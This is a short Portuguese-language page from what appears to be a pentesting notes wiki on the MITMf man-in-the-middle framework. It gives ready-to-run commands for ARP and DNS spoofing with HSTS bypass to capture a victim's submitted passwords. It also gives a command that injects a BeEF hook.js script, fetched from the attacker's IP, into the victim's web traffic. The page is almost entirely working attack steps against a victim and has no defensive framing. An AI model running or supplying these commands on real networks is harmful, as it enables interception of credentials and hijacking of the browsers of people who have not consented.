search

MITMF

MITMF (Man In The Middle Framework) é uma ferramenta que foi apartada dos outros tópicos devida a sua grande quantidade de recursos.

hashtag
Capturando Senhas de POST

python mitmf.py --spoof --arp --dns --hsts --gateway <ip_gateway> --target <ip_alvo> -i <intefafce_rede>

Agora espere a vítima acessar sites (incluindo https), que irá ser mostrado no terminal

hashtag
Inserir JS Beef XSS

python mitmf.py --spoof --arp -i wlan0 --gateway <ip_gateway> --target <ip_vitim> --hsts --inject --js-url http://<ip_atacante>:3000/hook.js

Agora só abrir o Beef XSS e verá a vítima online

PreviousDNS PoisoningNextTools

Last updated